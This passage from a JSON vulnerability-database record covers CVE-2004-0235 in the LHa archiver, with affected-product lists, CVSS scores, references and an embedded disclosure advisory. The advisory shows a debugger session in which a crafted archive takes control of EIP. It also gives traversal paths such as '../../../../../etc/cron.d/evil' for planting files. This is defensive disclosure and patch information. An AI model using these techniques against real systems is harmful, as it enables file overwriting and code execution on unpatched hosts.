                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_internet_security:2004:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_personal_express:4.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sgi:propack:2.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sgi:propack:3.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.6_sp1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.52:*:linux_gateways:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.52:*:linux_servers:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.42:*:windows_servers:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.42:*:workstations:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_personal_express:4.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_personal_express:4.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:stalker:cgpmcafee:3.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:tsugio_okamoto:lha:1.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:2003:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.52:*:linux_workstations:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.60:*:samba_servers:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.5:*:client_security:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.52:*:client_security:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:6.21:*:ms_exchange:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:internet_gatekeeper:6.31:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:internet_gatekeeper:6.32:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:tsugio_okamoto:lha:1.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:tsugio_okamoto:lha:1.17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:fedora_core:core_1.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2004-0235"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ulf Harnhammar\u203b ulfh@update.uu.se\u203bJean-S\u00e9bastien Guay-Leroux\u203b jean-sebastien@guay-leroux.com",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-176"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2004-0235",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 6.4,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "impactScore": 4.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 6.4,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2004-0235",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 6.4,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "VHN-8665",
            "impactScore": 4.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2004-0235",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200408-176",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-8665",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8665"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000170"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0235"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-176"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple directory traversal vulnerabilities in LHA 1.14 allow remote attackers or local users to create arbitrary files via an LHA archive containing filenames with (1) .. sequences or (2) absolute pathnames with double leading slashes (\"//absolute/path\"). \nThe first issues reported have been assigned the CVE candidate identifier (CAN-2004-0234). LHA is reported prone to two stack-based buffer-overflow vulnerabilities. An attacker may exploit these vulnerabilities to execute supplied instructions with the privileges of the user who invoked the affected LHA utility. \nThe second set of issues has been assigned CVE candidate identifier (CAN-2004-0235). In addition to the buffer-overflow vulnerabilities that were reported, LHA has been reported prone to several directory-traversal issues. An attacker may likely exploit these directory-traversal vulnerabilities to corrupt/overwrite files in the context of the user who is running the affected LHA utility. \n**NOTE: Reportedly, this issue may also cause a denial-of-service condition in the ClearSwift MAILsweeper products due to code dependency. \n**Update: Many F-Secure Anti-Virus products are also reported prone to the buffer-overflow vulnerability. LHa is a console-based decompression program. Carefully constructed file or directory names can execute arbitrary commands with process privileges. Attackers can build simple packages that corrupt system files when LHA operates. ------------------------------------------------------------------------\n\nLHa buffer overflows and directory traversal problems\n\nPROGRAM: LHa (Unix version)\nVENDOR: various people\nVULNERABLE VERSIONS: 1.14d to 1.14i\n                     1.17 (Linux binary)\n                     possibly others\nIMMUNE VERSIONS: 1.14i with my patch applied\n                 1.14h with my patch applied\nLHa 1.14: http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm\n          http://www2m.biglobe.ne.jp/~dolphin/lha/prog/\nLHa 1.17: http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/\nREFERENCES: CAN-2004-0234 (buffer overflows)\n            CAN-2004-0235 (directory traversal)\n\n* DESCRIPTION *\n\nLHa is a console-based program for packing and unpacking LHarc\narchives. \n\nIt is one of the packages in Red Hat Linux, Fedora Core, SUSE\nLinux, Debian GNU/Linux (non-free), Mandrakelinux, Slackware Linux,\nGentoo Linux, Yellow Dog Linux, Conectiva Linux and ALT Linux. \nIt is also included in the port/package collections for FreeBSD,\nOpenBSD and NetBSD. \n\n* OVERVIEW *\n\nLHa has two stack-based buffer overflows and two directory traversal\nproblems. They can be abused by malicious people in many different\nways: some mail virus scanners require LHa and run it automatically\non attached files in e-mail messages. Some web applications allow\nuploading and unpacking of LHarc archives. Some people set up their\nweb browsers to start LHa automatically after downloading an LHarc\narchive. Finally, social engineering is probably quite effective\nin this case. \n\n* TECHNICAL DETAILS *\n\na) two stack-based buffer overflows\n\nThe buffer overflows in LHa occur when testing (t) or extracting\n(x) archives where the archive contents have too long filenames\nor directory names. The cause of the problem is the function\nget_header() in header.c. This function first reads the lengths of\nfilenames or directory names from the archive, and then it reads\nthat many bytes to a char array (one for filenames and one for\ndirectory names) without checking if the array is big enough. \n\nBy exploiting this bug, you get control over several registers\nincluding EIP, as you can see in this session capture:\n\n$ lha t buf_oflow.lha\nLHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUU\nSegmentation fault\n$ lha x buf_oflow.lha\nLHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUU\nSegmentation fault\n$ gdb lha\nGNU gdb Red Hat Linux (5.3post-0.20021129.18rh)\nCopyright 2003 Free Software Foundation, Inc. \nGDB is free software, covered by the GNU General Public License, and\nyou are welcome to change it and/or distribute copies of it under\ncertain conditions. \nType \"show copying\" to see the conditions. \nThere is absolutely no warranty for GDB. Type \"show warranty\" for\ndetails. \nThis GDB was configured as \"i386-redhat-linux-gnu\"... \n(gdb) r x buf_oflow.lha\nStarting program: /usr/bin/lha x buf_oflow.lha\nLHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUU\n\nProgram received signal SIGSEGV, Segmentation fault. \n0x55555555 in ?? ()\n(gdb) bt\n#0 0x55555555 in ?? ()\nCannot access memory at address 0x55555555\n(gdb) i r\neax 0x4001e4a0 1073865888\necx 0xffffffe0 -32\nedx 0x24 36\nebx 0x55555555 1431655765\nesp 0xbfffdd50 0xbfffdd50\nebp 0x55555555 0x55555555\nesi 0x55555555 1431655765\nedi 0x55555555 1431655765\neip 0x55555555 0x55555555\neflags 0x210282 2163330\ncs 0x23 35\nss 0x2b 43\nds 0x2b 43\nes 0x2b 43\nfs 0x0 0\ngs 0x33 51\n(gdb) r t buf_oflow.lha\nThe program being debugged has been started already. \nStart it from the beginning? (y or n) y\nStarting program: /usr/bin/lha t buf_oflow.lha\nLHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUU\n\nProgram received signal SIGSEGV, Segmentation fault. \n0x55555555 in ?? ()\n(gdb) bt\n#0 0x55555555 in ?? ()\nCannot access memory at address 0x55555555\n(gdb) i r\neax 0x4001e4a0 1073865888\necx 0xffffffe0 -32\nedx 0x24 36\nebx 0x55555555 1431655765\nesp 0xbfffe6d0 0xbfffe6d0\nebp 0x55555555 0x55555555\nesi 0x55555555 1431655765\nedi 0x55555555 1431655765\neip 0x55555555 0x55555555\neflags 0x210286 2163334\ncs 0x23 35\nss 0x2b 43\nds 0x2b 43\nes 0x2b 43\nfs 0x0 0\ngs 0x33 51\n(gdb) q\nThe program is running. Exit anyway? (y or n) y\n$\n\nb) two directory traversal problems\n\nLHa has directory traversal problems, both with absolute paths\nand relative paths. There is no protection against relative paths\nat all, so you can simply use the lha binary to create an archive\nwith paths like \"../../../../../etc/cron.d/evil\". There is some\nsimple protection against absolute paths, namely skipping the first\ncharacter if it is a slash, but again you can simply use the binary\nto create archives with paths like \"//etc/cron.d/evil\". \n\n* ATTACHED FILES *\n\nI have written a patch against version 1.14i that corrects all\nfour problems. The patch is included as an attachment, together\nwith some test archives. \n\n* TIMELINE *\n\n18 Apr: contacted the vendor-sec list and the LHa 1.14 author\n18 Apr: tried to contact the LHa 1.17 author with a web form and\n        a guessed e-mail address which bounced\n19 Apr: reply from the vendor-sec list with CVE references\n30 Apr: Red Hat released their advisory\n01 May: I release this advisory\n\n// Ulf Harnhammar\nAdvogato diary :: http://www.advogato.org/person/metaur/\nidiosynkratisk (Swedish electropop zine) :: http://idiosynkratisk.tk/\nDebian Security Audit Project :: http://shellcode.org/Audit/\n\n------------------------------------------------------------------------\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2004-0235"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000170"
      },
      {
        "db": "BID",
        "id": "10243"
      },
      {
        "db": "VULHUB",
        "id": "VHN-8665"
      },
      {
        "db": "PACKETSTORM",
        "id": "33241"
      }
    ],
    "trust": 2.07
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2004-0235",
        "trust": 2.9
      },
      {
        "db": "BID",
        "id": "10243",
        "trust": 2.8
      },
      {
        "db": "XF",
        "id": "16013",
        "trust": 1.4
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000170",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-176",
        "trust": 0.7
      },
      {
        "db": "FULLDISC",
        "id": "20040501 LHA BUFFER OVERFLOWS AND DIRECTORY TRAVERSAL PROBLEMS",
        "trust": 0.6
      },
      {
        "db": "OVAL",
        "id": "OVAL:ORG.MITRE.OVAL:DEF:978",
        "trust": 0.6
      },
      {
        "db": "OVAL",
        "id": "OVAL:ORG.MITRE.OVAL:DEF:10409",
        "trust": 0.6
      },
      {
        "db": "FEDORA",
        "id": "FEDORA-2004-119",
        "trust": 0.6
      },
      {
        "db": "FEDORA",
        "id": "FLSA:1833",
        "trust": 0.6
      },
      {
        "db": "DEBIAN",
        "id": "DSA-515",
        "trust": 0.6
      },
      {
        "db": "BUGTRAQ",
        "id": "20040510 [ULF HARNHAMMAR]: LHA ADVISORY + PATCH",
        "trust": 0.6
      },
      {
        "db": "GENTOO",
        "id": "GLSA-200405-02",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2004:178",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2004:179",
        "trust": 0.6
      },
      {
        "db": "CONECTIVA",
        "id": "CLA-2004:840",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-8665",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "33241",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8665"
      },
      {
        "db": "BID",
        "id": "10243"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000170"
      },
      {
        "db": "PACKETSTORM",
        "id": "33241"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0235"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-176"
      }
    ]
  },
  "id": "VAR-200408-0141",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8665"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T11:41:21.801000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "LHA for UNIX Version 1.17",
        "trust": 0.8,
        "url": "http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/"
      },
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://lha.sourceforge.jp/"
      },
      {
        "title": "RHSA-2004:178",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2004-178.html"
      },
      {
        "title": "RHSA-2004:179",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2004-179.html"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000170"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2004-0235"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "http://www.securityfocus.com/bid/10243"
      },
      {
        "trust": 2.0,
        "url": "http://www.redhat.com/archives/fedora-announce-list/2004-may/msg00005.html"
      },
      {
        "trust": 1.8,
        "url": "http://marc.info/?l=bugtraq\u0026m=108422737918885\u0026w=2"
      },
      {
        "trust": 1.7,
        "url": "http://www.debian.org/security/2004/dsa-515"
      },
      {
        "trust": 1.7,
        "url": "https://bugzilla.fedora.us/show_bug.cgi?id=1833"
      },
      {
        "trust": 1.7,
        "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-may/020776.html"
      },
      {
        "trust": 1.7,
        "url": "http://security.gentoo.org/glsa/glsa-200405-02.xml"
      },
      {
        "trust": 1.7,
        "url": "http://www.redhat.com/support/errata/rhsa-2004-178.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.redhat.com/support/errata/rhsa-2004-179.html"
      },
      {
        "trust": 1.6,
        "url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026anuncio=000840"
      },
      {
        "trust": 1.4,
        "url": "http://xforce.iss.net/xforce/xfdb/16013"
      },
      {
        "trust": 1.4,
        "url": "http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:978"
      },
      {
        "trust": 1.1,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a10409"
      },
      {
        "trust": 1.1,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a978"
      },
      {
        "trust": 1.1,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16013"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2004-0235"
      },
      {
        "trust": 0.8,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2004-0235"
      },
      {
        "trust": 0.6,
        "url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=108422737918885\u0026w=2"
      },
      {
        "trust": 0.6,
        "url": "http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:10409"
      },
      {
        "trust": 0.4,
        "url": "http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/"
      },
      {
        "trust": 0.3,
        "url": "http://www.barracudanetworks.com/ns/products/spam_overview.php"
      },
      {
        "trust": 0.3,
        "url": "http://www.stalker.com/cgpmcafee/"
      },
      {
        "trust": 0.3,
        "url": "http://www.f-secure.com/security/fsc-2004-1.shtml"
      },
      {
        "trust": 0.3,
        "url": "http://mail.stalker.com/lists/cgatepro/message/61244.html"
      },
      {
        "trust": 0.3,
        "url": "http://images.mcafee.com/misc/mcafee_security_bulletin_05-march-17.pdf"
      },
      {
        "trust": 0.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2004-178.html"
      },
      {
        "trust": 0.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2004-219.html"
      },
      {
        "trust": 0.3,
        "url": "http://www.rarsoft.com/"
      },
      {
        "trust": 0.3,
        "url": "http://www.winzip.com/"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/366265"
      },
      {
        "trust": 0.1,
        "url": "http://marc.info/?l=bugtraq\u0026amp;m=108422737918885\u0026amp;w=2"
      },
      {
        "trust": 0.1,
        "url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026amp;anuncio=000840"
      },
      {
        "trust": 0.1,
        "url": "http://shellcode.org/audit/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0234"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0235"
      },
      {
        "trust": 0.1,
        "url": "http://idiosynkratisk.tk/"
      },
      {
        "trust": 0.1,
        "url": "http://www.advogato.org/person/metaur/"
      },
      {
        "trust": 0.1,
        "url": "http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm"
      },
      {
        "trust": 0.1,
        "url": "http://www2m.biglobe.ne.jp/~dolphin/lha/prog/"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8665"
      },
      {
        "db": "BID",
        "id": "10243"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000170"
      },
      {
        "db": "PACKETSTORM",
        "id": "33241"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0235"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-176"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-8665"
      },
      {
        "db": "BID",
        "id": "10243"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000170"
      },
      {
        "db": "PACKETSTORM",
        "id": "33241"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0235"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-176"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2004-08-18T00:00:00",
        "db": "VULHUB",
        "id": "VHN-8665"
      },
      {
        "date": "2004-04-30T00:00:00",
        "db": "BID",
        "id": "10243"
      },
      {
        "date": "2008-05-21T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2004-000170"
      },
      {
        "date": "2004-05-04T04:25:06",
        "db": "PACKETSTORM",
        "id": "33241"
      },
      {
        "date": "2004-08-18T04:00:00",
        "db": "NVD",
        "id": "CVE-2004-0235"
      },
      {
        "date": "2004-04-30T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200408-176"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-11T00:00:00",
        "db": "VULHUB",
        "id": "VHN-8665"
      },
      {
        "date": "2009-07-12T04:07:00",
        "db": "BID",
        "id": "10243"
      },
      {
        "date": "2008-05-21T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2004-000170"
      },
      {
        "date": "2017-10-11T01:29:24.810000",
        "db": "NVD",
        "id": "CVE-2004-0235"
      },
      {
        "date": "2006-09-20T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200408-176"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-176"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
